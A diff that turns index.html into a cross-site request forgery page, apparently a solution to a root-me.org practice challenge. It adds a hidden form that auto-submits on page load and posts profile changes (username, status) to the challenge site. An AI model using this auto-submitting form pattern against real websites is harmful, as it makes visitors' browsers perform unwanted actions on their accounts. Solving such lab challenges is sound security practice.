--- a/index.html
+++ b/index.html
@@ -1,1 +1,8 @@
-Hello World
+<html>
+  <body onload="document.forms[0].submit()">
+    <form action="http://challenge01.root-me.org/web-client/ch22/index.php?action=profile" method="POST">
+      <input type="hidden" name="username" value="test1">
+      <input type="hidden" name="status" value="on">
+    </form>
+  </body>
+</html>
